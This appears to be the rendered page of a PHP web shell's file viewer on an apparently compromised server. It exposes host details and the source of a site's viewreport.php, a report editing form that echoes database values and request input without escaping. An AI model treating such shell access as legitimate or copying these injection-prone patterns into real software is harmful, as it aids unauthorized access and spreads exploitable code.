( ′∀`)σ≡σ☆))Д′)レ(゚∀゚;)ヘ=З=З=Зε≡(ノ´_ゝ`)ノ HEX
HEX
Server: Apache/2.4.58 (Ubuntu)
System: Linux mail.thebrand.ai 6.8.0-107-generic #107-Ubuntu SMP PREEMPT_DYNAMIC Fri Mar 13 19:51:50 UTC 2026 x86_64
User: www-data (33)
PHP: 8.3.6
Disabled: NONE
Upload Files
File: /var/www/html/viewreport.php
<?php

$VideoPath = "uploads/live/";
$live_img = 'uploads/images/';	


 
  $newsid = $db->base64url_decode($newsid);
 
$result = $db->getnewsbyidr2($newsid);
$catalogid = $result[0]["catalogid"];
$yanani= $result[0]["yanani"];
echo $original= $result[0]["original"];
$title = $result[0]["title"];
$content = $result[0]["content"];
$viewnum = $result[0]["viewnum"];
$rating = $result[0]["rating"];
$picture = $result[0]["picture"];
$ratenum = $result[0]["ratenum"];
$episodeid = $result[0]["episodeid"];
$slug = $result[0]["slug"];
$keywords = $result[0]["keywords"];
$isdisplay = $result[0]["isdisplay"];
$description = $result[0]["description"];
$vcat = $result[0]["vcat"];
$summary = $result[0]["summary"];
$video = $result[0]["video"];
$thumb= $result[0]["thumb"];
$post_id=  $_GET["newsid3"];
 
 
   ?>
<link type="text/css" rel="stylesheet" href="rate/css/style.css">
        <link type="text/css" rel="stylesheet" href="rate/css/example.css">
        <script type="text/javascript" src="rate/jquery.min.js"></script>

<style type="text/css">
.style4 {
	color:#FFF; font-size:14px
	
	
} 
</style>
 
                
                
             
                    
                    
                    
<table id="Table_01" width="100%" height="537" border="0" cellpadding="0" cellspacing="0"   >
	<tr>
		<td valign="top">
        
   
                  
<form action="index.php" name="myform" id="myform" method="POST" ENCTYPE="multipart/form-data"> <input type="hidden" name="newsid" value="<?php print "$newsid"; ?>">
                  <input type="hidden" name="catid" value="<?php print "$catid"; ?>">
  <img src="images/crop.png" width="348" height="54" />
  
  
  
  
       
  
  
  
  
  <table width="245" border="0" cellpadding="0" cellspacing="0">
<tr>
                            <td colspan="3" align="left">
               
                            
                                 <?php   
                $submitted = $db->getallsubmitted(); 
               while (list($key,$val)=each($submitted)) {
		   $temp = stripslashes($val["newsid"]);
		   $picture = stripslashes($val["original"]);
		     if ($newsid ==$temp){?>
             <img src="taswira.php?image=/v/uploads/raw/<?php echo $picture ?>" alt="edit thumb" title="Published: 2014-03-24" style=" margin-left:2px;-moz-border-radius : 3px 3px 3px 3px:-webkit-border-radius : 3px 3px 3px 3px;border-radius : 3px 3px 3px 3px;">  <?php   }}
		
				   ?>
                               
                             
                            </td>
                          </tr>
                          
                          
                           <tr>
                      <td align="center" valign="top"><br>

                       
                        <input name="editnewsr2" type="submit" class="large ezbutton green" style=" margin-top:2px;border:0px;width:105px; margin-right:5px" value="Update">
                     <br />
<br />
 </td>
          </tr>
        </table>
</form>   </td>
                    </tr>
                  </table>